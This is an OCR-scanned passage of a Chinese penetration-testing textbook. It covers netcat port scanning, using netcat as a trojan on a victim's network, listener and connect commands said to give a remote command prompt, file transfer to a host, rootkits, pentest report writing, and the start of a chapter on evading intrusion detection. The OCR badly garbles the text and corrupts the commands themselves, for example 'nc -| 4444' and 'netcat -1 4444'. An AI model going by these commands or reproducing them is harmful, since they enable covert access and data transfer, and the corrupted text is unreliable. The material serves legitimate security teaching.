nc: connect to zebes.com port 4 (tcp) failed: Connection refused 
2 
nc: connect to zebes.com port 6 
1 


nc: Connect to zebes.com Port (tcp) failed: Connection refused 


Connection to zebes.com 22 port [tcp/ssh] succeeded! 


该 扫描 将 提供 大 量 信 息 ， 但 扫 摘 完成 后 ， 即 可 知道 目标 上 打开 或 关闭 了 哪些 端口 。 

现在 设想 将 netcat 作 为 木马 部 署 到 系统 中 。 在 受害 者 不 知 不 觉 地 将 该 软件 安装 在 他 们 
的 系统 中 后 ， 即 可 使 用 这 种 技术 扫描 受害 者 目 己 网 络 中 的 其 他 主机 。 下 文 将 介绍 如 何 做 到 
这 一 点 。 

返回 的 消 妃 将 发 送 到 标准 错误 (standard erroD。 可 将 标准 错误 消 轧 及 送 到 标准 输出 ， 


这 样 可 便于 过 滤 结 果 。 
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9.8.2 与 netcat 通 信 


netcat 具 备 很 多 功能 ， 例 如 在 主机 之 间 进 行 通信 。 可 在 客户 机 -服务 器 关系 中 连接 netcat 
的 两 个 实例 并 进行 通信 。 
台 计 算 机 中 何 为 服务 器 何 为 客户 端 是 在 初始 配置 中 设 定 的 ， 然 后 即 可 进行 通信 。 建 
立 连接 后 ， 两 点 之 间 的 双向 通信 是 完全 相同 的 。 
要 进行 此 类 通信 ， 必 须 执行 几 步 操作 。 首 先 ， 需 要 定义 客户 端 ， 可 以 通过 执行 以 下 命 
令 来 完成 : 


nc -| 4444 


这 将 配置 netcat 侦 听 端 口 4444 上 的 连接 。 

接 下 来 ， 在 第 二 台 机 器 上 通过 执行 以 下 命令 ， 发 起 连接 : 

netcat zebes.com 4444 

在 客户 端 中 ， 因 为 没有 开启 任何 命令 窗口 ， 似 乎 并 没有 任何 事情 发 生 。 但 是 ， 在 连接 
成 功 时 ， 将 在 系统 上 得 到 一 个 命令 提示 符 ， 可 以 从 中 辐 远 程 主机 发 出 命令 。 

完成 消息 传递 后 ， 只 需要 按 Ctrl + D 即 可 关闭 连接 。 


9.8.3 使 用 netcat 发 送 文件 


基于 上 面 的 例子 ， 还 可 以 完成 更 有 用 的 任务 。 下 面 介 绍 如 何 将 文件 传输 到 远程 主机 ， 
之 后 利用 此 功能 可 以 很 容易 地 构建 一 些 更 强大 的 攻击 。 因 为 建立 了 一 个 标准 的 TCP 连 接 ， 
可 以 通过 该 连接 传输 任何 类 型 的 信息 一 一 在 这 种 情况 下 ， 传 输 一 个 文件 。 

为 了 实现 这 一 点 ， 必 须 首 先 选择 连接 的 一 器 为 侦 听 问 。 然 而 ， 在 此 并 不 是 与 上 一 个 例 
子 中 一 样 ， 将 信息 打印 到 屏幕 上 ， 而 是 将 所 有 信息 直接 存 入 一 个 文件 中 : 

netcat -1 4444 > received file 

在 第 二 台 计 算 机 上 ， 通 过 输入 以 下 内 容 创 建 一 个 简单 的 文本 文件 : 

echo "Hello, this 15 a file™" > original file 

现在 即 可 使 用 此 文件 ， 作 为 下 一 步 向 监听 计算 机 建立 的 netcat 连 接 的 输入 。 该 文件 将 
被 传输 到 监听 计算 机 ， 惑 像 它 是 以 交互 方式 输入 的 一 样 : 

netcat zebes.com 4444 < original file 

可 以 在 侦 听 连接 的 计算 机 上 看 到 ， 其 中 现 有 一 个 名 为 received file 的 新 文件 ， 文 件 中 
包含 在 另 一 台 计 算 机 上 所 输入 的 文件 的 内 容 : 


Notepad received file 


Hello, this 1s a file 
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如 你 所 见 ， 通 过 使 用 netcat， 可 以 很 容易 地 利用 此 连接 传输 各 种 信息 ， 包 括 整个 目录 
的 信息 。 


9.9 安 半 rootkit 


rootkit 是 一 种 非常 危险 的 恶意 软件 形式 。 这 种 类 型 的 恶意 软件 从 内 核 级 植 入 到 计算 机 
中 ， 可 以 提供 远程 访问 、 系 统 信息 和 数据 信息 、 执 行 侦察 行动 、 安装 软件 以 及 执行 许多 
其 他 任务 ， 所 有 这 些 行为 都 不 会 问 系 统 或 用 户 暴 露 其 存在 。 

rootkit 最 初出 现 于 20 世 纪 90 年 代 ， 经 过 多 年 的 演变 ， 它 已 变 得 更 加 危险 而 恶性 。 事 
实 上 ， 现 代 版 本 的 rootkit 可 以 将 其 自身 舱 入 操作 系统 的 内 核 ， 从 而 可 以 从 根本 上 改变 操作 
系统 本 身 的 行为 。 它 们 可 以 拦截 来 自 操 作 系 统 (外 延 到 应 用 程序 ) 的 请 求 ， 并 用 虚假 信息 啊 
应 。 由 于 rootkit 通 常设 计 为 从 操作 系统 和 系统 日 志 隐 藏 其 进程 ， 因 此 难以 检测 和 删除 。 

在 理想 情况 下 ， 采 用 本 章 别 处 所 述 的 方法 ， 例 如 木马 程序 ， 攻 击 者 可 以 快速 有 效 地 
将 rootkit 植 入 系统 中 。 接 收 到 恶意 内 容 的 用 户 可 能 会 无 意 中 激活 rootkit 并 将 其 安装 到 系统 
中 。 安 装 过 程 可 能 非常 快速 而 隐秘 ， 不 会 显示 任何 危险 信号 。 在 其 他 情况 下 ， 仅 仅 是 浏览 
Internet 时 访问 受 感染 网 站 的 行为 就 足以 导致 感染 。 

在 安装 了 rootkit 后 ， 只 要 目标 计算 机 联机 ， 黑 客 即 可 秘密 地 与 其 通信 ， 以 触发 任务 
或 神 取 信息 。 在 其 他 情况 下 ，rootkit 可 用 于 安装 更 多 隐藏 的 程序 ， 并 在 系统 中 建立 “后 
门 ”。 如 果 黑 客 想 窃 取信 息 ， 可 以 安装 一 个 键盘 记录 程序 。 该 程序 将 在 在 线 和 离线 状态 
下 ， 秘 密 记 录 受 害 者 录入 的 所 有 内 容 ， 并 在 下 一 次 有 机 会 时 ， 将 结果 提供 给 攻击 者 。 

rootkit 的 其 他 恶意 用 途 包 括 攻陷 数 折 甚至 数 十 万 台 计 算 机 ， 形 成 一 个 称 为 僵尸 网 络 
(botneb 的 远程 “rootkit 网 络 ”。 僵 尸 网 络 用 于 回 其 他 计算 机 发 动 分 布 式 拒绝 服务 (DDoS) 攻 
击 ， 发 送 垃圾 邮件 、 病 毒 和 木马 。 这 项 活动 如 果 退 滑 到 发 件 人 ， 可 能 会 导致 执法 者 从 并 不 
知道 其 计算 机 已 被 用 于 非法 目的 的 无 率 机 主 手中 没收 计算 机 。 
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恶意 软件 是 一 个 用 于 泛 指 包括 病毒 、 蠕 虫 、 木 马 和 逻辑 炸弹 以 及 广告 软件 和 间谍 软件 
的 一 系列 软件 的 术语 。 这 些 悉 意 软件 中 的 每 一 种 都 在 多 年 造成 了 种 种 问题 ， 其 危害 程度 从 
引 人 烦 恼 到 造成 巨大 破坏 不 等 。 总 的 来 说 ， 亚 意 软 件 发 展 十 分 迅速 ， 具 备 了 和 傻 取 密码 、 个 
人 信息 和 盗用 号 份 的 能 力 ， 并 用 于 无 数 其 他 犯罪 中 。 


9.11 习题 


(1) rootkit 有 何 用 途 ， 为 何其 十 分 危险 ? 
(2) 何 为 病毒 ? 

(3) 木马 通常 是 如 何 侵入 系统 的 ? 

(4) 后 门 有 何 用 途 ? 

(5) 列举 一 些 使 用 netcat 的 理由 ? 


只 有 文 胰 工作 完成 后 ， 一 项 工作 才 算 真正 完成 。 对 客户 的 网 络 和 整体 环境 进行 渗透 济 
试 的 过 程 当然 也 是 如 此 。 在 测试 成 功 完 成 后 ， 客 尸 会 期 望 获得 一 份 包含 有 整个 渗透 测试 的 
结果 ， 以 及 对 发 现 的 缺陷 的 修补 措施 的 报告 。 这 一 测试 流程 的 重要 环节 是 打包 整理 完成 的 
所 有 任务 和 过 程 ， 提 交 给 客户 的 高 级 员工 和 技术 人 员 ， 同 时 记录 在 案 以 满足 合 规 性 和 法 律 
要 求 。 

报告 应 描述 渗透 测试 的 成 果 ， 包 括 测试 的 目标 、 使 用 的 方法 、 漏 洞 、 对 这 些 漏洞 的 成 
功利 用 、 建 议 以 及 客户 要 求 的 其 他 相关 和 支持 性 文档 。 


本 草 将 学 习 : 
名 明确 报告 中 应 包括 的 内 容 
添加 支持 文档 
”确保 报告 中 没有 文字 错误 


以 


10.1 报告 测试 参数 


报告 的 第 一 部 分 应 该 是 规划 阶段 或 章节 。 本 节 用 于 介绍 报告 本 身 将 处 理 和 涉及 的 一 些 
基本 要 点 。 在 撰写 报告 时 ， 渗 透 测 试 者 将 使 用 本 部 分 作为 报告 其 余部 分 的 基础 ， 同 时 癌 客 
户 传达 一 些 需 要 预先 了 解 的 要 点 。 

该 文档 可 能 会 从 你 和 客户 的 最 初 交流 和 访谈 中 借鉴 大 量 信息 。 实 际 上 ， 文 档 的 这 一 部 
分 至 少 应 该 反映 出 与 客户 的 初始 对 话 的 部 分 内 容 ， 以 确定 报告 的 其 余部 分 的 重点 。 

在 实践 中 ， 这 一 阶段 的 主要 重点 是 确定 一 套 能 够 有 效 表达 客户 方 公司 联络 点 与 渗透 测 
试 者 之 间 的 交流 的 文档 规范 ， 主 要 关注 以 下 一 些 关 键 点 : 

@ 日 标 (objectives) 
受众 (audience) 

时 间 (time) 

密级 (classification) 

分 发 (distribution) 

这 是 规划 阶段 中 最 为 基本 的 五 点 ， 接 下 来 将 一 一 详细 阐述 它们 。 


目标 

目标 部 分 是 项 目 开始 时 规划 阶段 的 一 个 重点 。 在 此 阶段 中 ， 渗 透 测试 者 将 决定 测试 项 
目的 具体 目标 以 及 需要 记录 的 内 容 。 

可 将 文档 或 报告 的 目标 部 分 视 为 一 份 后 续 部 分 的 执行 纲要 。 该 部 分 旨 在 帮助 受众 获得 


对 该 项 目的 宏观 了 解 。 目 标 部 分 提供 了 一 份 对 项 目 、 项 目 目 标 、 项 目的 总 体 范 围 以 及 本 报 
告 如 何 帮 助 实现 这 些 目标 的 简要 概览 。 


受众 

明确 报告 的 受众 是 至 天 重要 的 ， 因 为 这 样 做 可 以 有 的 放 和 天 ， 确 保 合 适 的 人 读 到 报告 ， 
并 且 这 些 人 员 能 够 充分 理解 报告 以 利用 其 中 的 信息 。 阅 读 渗透 测试 报告 的 人 员 可 能 十 分 广 
泛 ， 从 首席 信息 安全 官员 到 首席 执行 官 (CEO)， 以 及 客户 组 织 内 任意 数量 的 技术 和 行政 人 
员 。 对 于 报告 的 目标 群体 不 仅 应 在 撰写 文档 时 考虑 ， 还 要 在 交付 文档 时 考虑 ， 以 确保 将 结 
果 交 付 到 合适 的 人 手中 : 可 以 充分 利用 该 文档 的 人 员 。 编 写 完 报 告 后 ， 人 至 关 重 要 的 是 确保 
报告 按照 一 种 本 部 分 中 明确 的 受众 能 够 理解 和 利用 其 内 容 的 方式 进行 建构 。 


时 间 

文档 的 该 部 分 确定 了 测试 的 时 间 表 。 本 节 应 包括 测试 的 开始 和 结束 时 间 。 另 外 ， 如 果 
不 是 全 天 候 进 行 测试 ， 还 应 包括 一 天 中 进行 测试 的 具体 时 间 。 该 时 间 描 述 将 有 助 于 确定 测 
试 达到 了 预期 目标 ， 并 在 理想 的 或 能 够 最 好 地 反映 特定 运营 状况 的 条 件 下 进行 。 


密级 

由 于 渗透 测试 报告 包含 高 度 敏 感 的 信息 ， 例 如 安全 缺陷 、 漏 筒 、 认 证 和 系统 信息 ， 应 
将 报告 的 密级 定 为 极其 敏感 。 渗 透 测 试 者 还 应 确保 总 是 将 报告 交 给 客户 所 指定 的 负责 人 。 

应 在 项 目 开 始 时 与 联系 人 讨论 项 目 和 报告 的 密级 ， 以 确保 不 将 保密 信息 泄露 给 未 经 授 
权 的 人 员 。 渗 透 测 试 者 还 应 讨论 如 何在 报告 中 记录 保密 信息 。 

在 当今 的 环境 中 ， 由 于 便捷 性 且 具 备 额外 的 安全 手段 ， 许 多 客户 都 选择 以 数字 方式 、 
而 非 传 统 的 印刷 品 形式 分 发 报告 。 如 果 客 户 需要 数字 格式 报告 ， 请 确保 使 用 诸如 数字 签名 
和 加 密 等 安全 措施 ， 以 确保 报告 始终 未 被 自 改 并 保密 。 

分 发 

报告 的 分 发 管理 对 于 确保 将 报告 在 正确 的 时 间 内 提交 给 授权 人 员 起 看 重要 的 作用 。 


10.2 ”收集 信息 


在 渗透 测试 过 程 中 ， 完 整地 记录 所 执行 的 每 项 操作 或 任务 及 其 动机 和 结果 十 分 重要 。 
当 随 独 时 间 的 推移 ， 你 的 渗透 测试 技能 、 知 识 和 经 验 得 到 提升 时 ， 融 能 更 好 地 把 握 如 何 取 
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铭记 录 的 项 目 。 在 你 的 经 验 更 加 丰富 ， 知 识 更 加 渊博 时 ， 就 有 可 能 了 解 到 一 些 可 在 不 需要 
过 度 干扰 或 破坏 工作 的 前 提 下 ， 帮 助 记 录 工 作 步 又 的 第 三 方 产 品 和 实用 程序 。 渗 透 测试 者 
应 至 少 保 有 对 于 以 下 操作 的 证 明 : 

@ 成 功 的 漏洞 利用 

@ 执行 的 漏洞 利用 

@ 渗透 测试 过 程 中 的 基础 设施 失效 

问题 是 如 何 维护 这 些 信息 并 将 其 包含 在 报告 中 ? 以 下 是 可 以 考虑 的 协议 记录 信息 以 将 
其 纳入 报告 的 方法 : 


截图 

对 成 功 和 失败 的 漏洞 利用 、 错 误 信息 、 邮 件 以 及 其 他 记录 行动 所 需 的 结果 进行 截图 。 
例如 ， 在 成 功 完成 给 定 的 漏洞 利用 之 后 ， 使 用 屏幕 截图 展示 漏洞 利用 的 结果 ， 并 防止 漏洞 
利用 不 能 复 现 的 情况 出 现 。 显 示 错误 信息 和 其 他 输出 的 屏幕 截图 也 是 有 用 的 ， 因 为 可 将 它 
们 展示 给 客户 和 技术 人 员 或 其 他 人 员 ， 以 说 明 他 们 需要 解决 的 具体 问题 。 


记 记 录 

由 于 坚 无 颖 问 渗透 测试 过 程 中 产生 的 很 大 一 部 分 信息 将 被 纳入 各 种 系统 中 的 各 种 应 用 
程序 的 日 志 中 ， 因 此 这 些 信 息 也 应 该 包含 在 报告 中 。 选 择 哪些 日 志 记 录 纳 入 报告 将 取决 于 
客户 而 千差万别 ， 但 可 以 预期 文档 中 将 包 合 一 些 日 志 。 由 于 可 能 生成 大 量 日 志 ， 因 此 可 能 
会 发 现 数字 形式 的 报告 在 这 方面 比较 便利 。 

脚本 

在 适当 的 情况 下 ， 可 以 选择 纳入 任何 在 渗透 测试 过 程 中 所 使 用 的 脚本 ， 脚 本 可 以 是 目 
行 编写 的 ， 也 可 以 来 自 其 他 来 源 。 通 第 这 样 做 是 为 了 回 技 术 人 员 或 技术 相关 人 员 说 明 菏 


些 细 丰 。 


10.3 ”突出 重要 信息 


每 一 份 报告 中 都 有 关于 该 文档 结构 和 格式 的 重要 信息 。 在 此 章 市 中 ， 将 涵盖 每 个 报告 
报告 文件 应 具有 以 下 结构 : 

报告 封面 页 

报告 属性 

报告 索引 

行动 纲要 (executive summary) 


@ 发 现 问题 的 清单 
@ 发 现 问题 的 详情 说 明 
应 当做 好 花费 大 量 时 间 编 制 该 文档 的 准备 。 下 面 介 绍 其 基本 要 点 。 


报告 封面 页 

这 是 报告 的 第 一 页 ， 提 供 有 关 该 项 目的 基本 信息 。 典 型 的 封面 应 包括 以 下 内 容 : 
@ 项 目标 题 

@ 客户 名 称 

@ 报告 版 本 

@ 作者 信息 

@ 日 期 


报告 属性 

第 二 页 提供 参与 项 目 人 员 的 更 多 有 关 人 信息。 本 页 面 将 提供 以 下 信息 : 
@ 客户 信息 

@ 测试 公司 的 信息 

@ 渗透 测试 者 信息 

@ 有 关 参 与 项 目的 其 他 人 的 信息 


报告 索引 

本 节 由 目录 和 图 片 组 成 ， 以 便于 查阅 报告 内 容 : 

@ 目录 中 列 出 了 主要 主题 标题 及 其 页 码 。 下 级 标题 也 将 列 出 ， 但 不 必 包 括 页 码 。 
@ 图 目录 列 出 了 报告 中 使 用 的 所 有 图 像 及 其 标题 和 页 码 。 


行动 纲要 
“行动 网 要 ”部 分 应 在 项 目 完成 后 编写 ， 目 的 是 简要 说 明 渗 透 测 试 过程 。 本 节 专 为 高 


层 员工 而 设计 。 它 用 简短 的 文字 描述 了 测试 中 使 用 的 方法 、 发 现 的 重大 问题 和 组 织 的 安全 
级 别 。 


e@ “项 目 目标 ”部 分 包括 执行 渗透 测试 的 目标 ， 以 及 测试 如 何 帮 助 实现 这 些 目标 。 
“项 目 范围 ”部 分 通过 清晰 描述 所 执行 渗透 测试 的 边界 ， 说 明 项 目的 许可 和 限 
制 。 该 部 分 包括 待 测试 目标 系统 的 相关 信息 ， 基 于 预算 和 时 间 分 配 ， 选 定 的 渗透 
测试 的 类 型 和 深度 ， 项 目的 限制 (例如 某 些 拒绝 服务 测试 是 禁止 的 ， 或 者 只 能 在 工 
作 时 间 开 展 渗透 测试 之 类 具体 的 限制 ) 及 其 影响 。 
e@ “授权 ”部 分 提供 有 关 进 行 渗透 测试 的 许可 的 信息 。 在 得 到 客户 端 和 第 三 方 服务 
提供 商 的 适当 书面 授权 之 前 ， 不 得 开始 测试 。 该 信息 应 在 报告 中 记录 。 

所 有 渗透 测试 者 所 做 的 假定 均 应 在 报告 中 明确 提 及 ， 因 为 这 样 做 可 以 帮助 客户 理 
解 测试 过 程 中 所 采取 行动 的 理由 。 渗 透 测试 是 一 个 侵入 性 的 过 程 ， 因 此 描述 清楚 
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每 一 个 假定 ， 能 够 保护 渗透 测试 者 。 

@ “时 间 表 ”部 分 使 用 时 间 术 语 说 明 渗 透 测 试 过 程 在 时 间 上 的 生命 周期 。 本 节 包 括 
测试 过 程 的 持续 时 段 ， 以 及 对 目标 进行 测试 的 时 间 。 由 于 本 节 明 确 声 明 所 有 的 发 
现 都 是 在 所 描述 的 时 间 段 内 得 到 的 ， 在 之 后 出 现 新 漏洞 时 可 以 帮助 渗透 测试 者 ( 任 
何 配置 更 改 都 不 是 渗透 测试 者 的 责任 )。 

@ “渗透 测试 摘要 ”描述 发 现 的 重大 和 中 等 问题 ， 给 出 一 份 简要 的 渗透 测试 过 程 技 
术 概 述 。 摘 要 应 该 只 报告 重要 的 发 现 ， 并 在 一 个 单 句 中 描述 。 本 节 还 介绍 了 渗透 
测试 所 用 的 方法 学 。 


发 现 问题 清单 

在 “发 现 问 题 清单 ”章节 中 ， 所 有 级 别 的 发 现 痢 以 表格 形式 记录 ， 以 提供 可 快速 查 
阅 的 系统 安全 漏洞 相关 信息 。 问 题 清单 可 依据 进行 的 测试 进行 划分 。 也 王 是 说 ， 如 果 针 对 
Web 应 用 程序 、IT 基 础 架构 和 移动 应 用 程序 进行 了 测试 ， 则 可 以 为 每 个 被 测 环境 制作 单独 
的 问题 清单 。 如 果 进 行 了 大 规模 的 IT 基础 架构 测试 ， 那 么 可 以 制作 一 个 仅 包括 高 级 和 中 级 
漏洞 的 较 小 问题 清单 ， 并 将 完整 清单 纳入 对 应 章节 中 。 


发 现 问 题 详情 说 明 
“发 现 问 题 详情 说 明 ” 章 节 包 含 了 修复 建议 。 该 章节 将 由 直接 处 理 IT/ 信 息 安 全 和 IT 
运营 的 人 员 阅 读 。 所 以 ， 渗 透 测 试 者 可 以 自由 使 用 技术 名 词 朱 述 和 漏洞 相关 的 各 种 信息 。 
该 章节 包括 以 下 详细 信息 : 

e@ 在 “漏洞 定义 ”一 节 中 ， 通 过 提供 有 关 漏 洞 的 详细 信息 ， 给 出 所 进行 的 漏洞 利用 
操作 的 基础 信息 。 说 明 信 息 应 直接 基于 渗透 测试 者 工作 的 环境 。 渗 透 测试 者 可 以 
推荐 一 个 附录 和 引用 文献 章节 ， 用 于 收集 更 多 信息 。 

@ 在 “脆弱 性 ”一 市 中 ， 渗 透 测 试 者 应 该 通过 重点 描述 坏 境 ， 描 述 脆弱 性 的 根本 原 
因 。 例 如 ， 对 于 登录 页 面 中 存在 SQL 注 入 漏洞 的 情况 ， 渗 透 测 试 者 应 指出 用 户 名 
字段 对 某 些 类 型 的 SQL 注入 攻击 是 脆弱 的 ， 并 列 出 这 些 类 型 ， 而 不 是 仅仅 提供 一 
个 “登录 页 面 易 受 SQL 攻 击 ” 的 粗略 说 法 ， 并 将 问题 留 给 客户 。 

@ 在 “概念 验证 ”一 节 中 ， 渗 透 测试 者 为 所 进行 的 漏洞 利用 操作 给 出 概念 验证 。 在 
大 多 数 情况 下 ， 漏 洞 利 用 的 截图 或 结果 就 足够 了 。 例 如 ， 对 于 路 站 脚本 攻击 ， 攻 
击 癌 量 和 结果 的 屏幕 截图 就 绰绰有余 。 

@ “影响 范围 ”说 明 某 个 可 能 的 漏洞 利用 将 导致 的 影响 。 漏 铀 利用 的 影响 总 是 取 诀 
于 后 果 的 严重 程度 。 例 如 ， 登 录 参 数 的 反射 式 跨 站 脚本 攻击 ， 将 比 搜索 参数 的 反 
冉 式 跨 站 脚本 攻击 具有 更 高 的 影响 。 因 此 ， 基 于 渗透 测试 环境 ， 分 析 和 说 明 攻 击 
的 影响 十 分 重要 。 

@e “可 能 性 ”一 节 解 释 了 漏洞 利用 的 可 能 性 。 可 能 性 总 是 取决 于 攻击 的 容易 程 
度 、 公 开 性 、 可 靠 性 和 交互 操作 依赖 程度 。 所 谓 交 互 操 作 依 赖 程度 (interaction 
dependent) 是 指 是 否 可 在 无 任何 人 工 干预 和 授权 的 情况 下 执行 该 攻击 。 例 如 ， 


Metasploit 的 任意 代码 执行 攻击 的 可 能 性 将 高 于 提 权 攻击 的 可 能 性 。 

@ “风险 评估 ”一 节 根 据 脆弱 性 、 威 胁 、 影 响 和 攻击 的 可 能 性 确定 最 终 风 险 级 别 。 
在 风险 评估 之 后 ， 渗 透 测 试 者 应 通过 标示 风险 等 级 ， 编 写 和 创建 一 个 对 应 的 发 现 
问题 项 。 

@ 在 发 现 问 题 清单 中 指出 一 个 漏洞， 而 未 在 “建议 ” 章 市 中 描述 如 何 管理 该 漏洞 ， 

意味 着 安全 评估 工作 只 完成 了 一 半 。 

在 此 过 程 结束 时 ， 应 至 少 生 成 两 份 提交 和 /或 展示 给 客户 的 报告 。 其 中 一 份 报告 应 该 
在 技术 上 更 深入 ， 针 对 那些 主要 关注 风险 缓解 策略 的 员工 。 另 一 份 报告 则 应 不 那么 强调 技 
术 性 ， 供 高 级 管理 人 员 查 阅 ， 用 于 商业 目的 和 长 期 战略 的 制定 。 

客户 可 能 会 要 求 以 数字 形式 交付 报告 ， 而 不 需要 其 他 工作 。 客 户 也 可 能 要 求 将 正式 
的 演示 文稿 交付 给 技术 人 员 和 管理 人 员 。 此 外 ， 客 户 可 能 会 要 求 渗透 测试 者 与 技术 人 员 合 
作 ， 为 发 现 的 问题 制定 解决 方案 和 策略 。 


10.4 添加 支持 文档 


支持 信息 是 所 有 有 助 于 解释 漏洞 利用 的 信息 ， 但 对 于 漏洞 利用 的 报告 和 修复 信息 不 应 
直接 依赖 于 该 信息 。 

以 下 信息 可 以 作为 支持 数据 包含 在 报告 中 。 

方法 学 

在 本 节 中 ， 列 出 测试 中 使 用 的 方法 学 。 例 如 ， 可 以 在 此 引用 渗透 测试 执行 标准 


(Penetration Testing Execution Standard ， 了 PTES )。 


工具 
在 本 节 中 列 出 测试 中 使 用 的 所 有 工具 。 本 章 说 明了 用 于 该 漏洞 评估 项 目的 资源 量 。 
附录 


报告 的 主要 目的 是 展示 渗透 测试 者 进行 的 所 有 工作 ， 以 及 破解 客户 的 安全 体系 的 成 
功 程度 。 报 告 描 述 客户 环境 中 的 漏洞 ， 以 及 他 们 应 该 采取 的 行动 。 但 有 时 可 能 希望 给 出 更 
为 一 般 性 和 详细 的 解释 一 一 附录 就 是 用 于 此 目的 。 附 录 包 含 与 漏洞 利用 相关 的 附加 信息 ， 
但 是 这 些 说 明 并 非 必 须 阅 读 ， 且 不 应 该 直接 基于 测试 环境 。 附 录用 于 阐述 额外 而 非 必 需 的 
知识 。 读 者 可 以 决定 是 否 要 阅读 该 信息 。 例 如 ， 可 以 通过 解释 ACK/NULL/FIN 和 Xmas 扫 
描 ， 介 绍 有 关 端 口 扫 描 的 更 多 详细 信息 ， 但 漏洞 修复 措施 不 应 基于 此 假定 性 信息 。 


参考 

有 时 会 发 现 难以 演示 茶 种 攻击 。 在 这 种 情况 下 ， 可 以 引用 其 他 研究 人 员 的 工作 作为 参 
考 。 你 的 时 间 不 是 无 限 的 ， 无 法 写 出 每 一 个 细节 ， 但 可 以 通过 引用 参考 信息 ， 给 出 一 个 真 
实 的 漏洞 利用 场景 。 


术语 表 
渗透 测试 报告 是 一 套 完整 的 技术 流程 的 成 果 ， 这 套 流程 经 种 使 用 高 度 技术 性 的 名 词 。 
为 便于 管理 人 员 ， 应 在 报告 末尾 制作 一 份 术语 表 ， 给 所 有 术语 下 一 个 简单 的 定义 。 


人 非 圣 贤 讨 能 无 过 ， 但 客户 可 能 不 会 理解 这 一 点 ， 而 IT 安全 人 员 甚至 不 会 理解 那些 微 
不 足 道 的 错误 。 所 以 在 完成 第 一 份 报告 之 后 一 一 该 报告 基本 上 是 一 份 草稿 ， 因 为 它 未 经 过 


质量 保证 流程 一 一 应 该 目 行 审查 该 报告 ， 或 者 在 理想 的 情况 下 ， 由 工作 团队 中 其 他 的 成 员 
进行 审查 。 


技术 质量 保证 可 视 为 条 种 很 短 的 渗透 测试 。 在 常规 渗透 测试 中 ， 可 能 发 生 各 种 问题 ， 
例如 ， 渗 透 测 试 者 不 记 检查 、 误 解 ， 或 是 未 能 正确 记录 攻 些 漏洞 。 技 术 质量 保证 就 是 针对 
这 些 可 能 问题 ， 在 技术 上 保证 报告 和 项 目的 质量 。 

技术 质量 保证 应 确保 渗透 测试 者 已 检查 了 每 一 个 明显 的 攻击 可 能 性 。 例 如 ， 测 试 人 员 
针对 茶 个 登录 页 面 ， 检 查 了 XSS 攻 击 、 骏 力 破解 ， 但 瑟 记 对 SQL 注入 攻击 、 用 户 枚 举 和 其 
他 可 能 的 攻击 进行 检查 。 Web 应 用 程序 可 能 非常 脆弱 。 为 一 个 例子 是 测试 者 报告 了 一 个 
Web 信 息 泄露 漏洞 ， 但 未 报告 使 用 了 未 修补 的 Web 服 务 器 。 在 技术 质量 保证 阶段 中 ， 应 确 
保 在 给 定 的 评估 时 间 允 许 的 情况 下 ， 执 行 了 每 一 种 可 能 的 渗透 测试 。 

技术 质量 审 伍 应 确保 渗透 测试 者 没有 误解 任何 漏洞 ， 没 有 提出 错误 的 观点 。 例 如 ， 剖 
试 人 员 收 到 SQL 错误 时 ， 却 报告 了 一 个 路 站 脚本 漏洞 ， 可 能 是 因为 测试 着 误解 了 SQL 注入 
攻击 的 可 能 性 。 

技术 质量 审查 的 男 一 个 目标 是 确保 报告 的 质量 。 你 可 能 拥有 各 种 类 型 的 客 尸 ， 其 中 一 
些 可 能 拥有 深厚 的 技术 背景 ， 而 另 一 些 可 能 是 业界 新 手 。 因 此 应 当 顾 及 每 一 类 受众 ， 尽 可 
能 详尽 地 撰写 一 份 解释 性 报告 。 报 告 通常 应 包括 可 能 的 攻击 的 定义 、 原 因 、 证 据 、 风 险 评 
估 、 解 决 方案 和 参考 信息 。 所 有 这 些 要 点 均 应 使 用 简洁 的 语言 进行 详细 的 解释 。 
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10.6 ”本章 小 结 


在 渗透 测试 工作 完成 后 ， 客 户 将 期 望 看 到 一 份 记录 了 进行 的 工作 以 及 提出 的 建议 的 报 
告 。 该 过 程 的 重要 环节 是 打包 整理 完成 的 所 有 任务 和 过 程 ， 提 交 给 客户 的 高 级 员工 和 技术 
人 员 ， 保 存 文件 副本 以 备 合 规 性 和 法 律 用 途 。 

报告 应 该 介绍 渗透 测试 过 程 的 成 果 ， 包 括 测试 的 目标 ， 使 用 的 方法 ， 漏 洞 
洞 的 成 功利 用 、 建 议 以 及 客户 要 求 的 其 他 相关 和 支持 性 文档 。 


1. 报告 有 何 用 途 ? 

2. 为 何 渗透 测试 者 应 该 伦 时 间 和 精力 提高 写作 能 力 ? 
3. 你 会 在 报告 中 包含 多 少 技术 信息 ? 
4 
DS 


. 列举 一 些 客户 在 测试 后 需要 报告 的 原因 ? 
. 为 何 报告 需要 使 用 某 种 格式 ? 


应 对 安防 和 检测 系统 


到 目前 为 止 ， 本 书 已 经 介绍 了 诸多 攻击 ,但 并 未 非常 关注 某 个 特定 目标 的 防御 方 。 目 
标 必 然 和 采取 茶 种 类 型 的 防御 措施 ， 因 此 需要 知道 如 何 应 对 这 些 防御 ， 并 尽 可 能 地 规避 或 阻 
断 对 (攻击 ) 行 为 的 检测 。 被 检测 到 意味 着 攻击 可 能 被 阻止 或 迟 洲 。 

当前 的 网 络 采 用 了 从 防火 墙 ， 到 反 恶 意 软件 ,再 到 入 侵 检测 系统 的 大 量 防御 性 设备 。 
每 类 设备 旨 在 解决 一 种 或 多 种 对 系统 的 攻击 或 威胁 。 在 许多 情况 下 ，( 系 统 ) 将 综合 运用 多 
个 设备 ， 形 成 一 个 更 为 完整 有 效 的 解决 方案 。 

虽然 这 些 设备 是 阻止 攻击 成 功 的 障碍 ， 但 是 只 要 应 用 了 适当 的 思路 和 方法 ， 就 有 可 能 
战胜 它们 。 本 章 将 重点 介绍 这 些 安防 系统 及 其 应 对 方法 。 


本 章 将 学 习 : 
名 对 比 网 络 入 侵 检 测 系 统 (NIDS) 与 主机 入 侵 检测 系统 (HIDS) 
人 识别 入 侵 的 迹象 
名 ”规避 A 入侵 检测 系统 (IDS) 


11.1 检测 入 侵 


入 侵 检 测 系统 IDS) 与 防盗 报警 器 或 烟 筋 探测 融 等 应 用 或 设备 的 作用 相同 : 同系 统 所 
有 者 提供 一 种 检测 和 警告 潜在 危险 的 手段 。 请 谨 记 ，IDS 中 的 DD 代表 检测 ， 这 正 是 该 机 制 
的 预期 功能 一 一 严格 如 此 ， 不 多 不 少 。 与 许多 其 他 设备 不 同 ，IDS 是 一 种 反应 型 设备 ， 但 
这 并 不 意味 着 它 在 系统 的 方案 中 作用 不 重要 。 


11.1.1 基于 网 络 的 入 侵 检 测 


IDS 的 其 中 一 种 是 网 络 入 侵 检 测 系 统 (Network Intrusion Detection System，NIDS), 它 
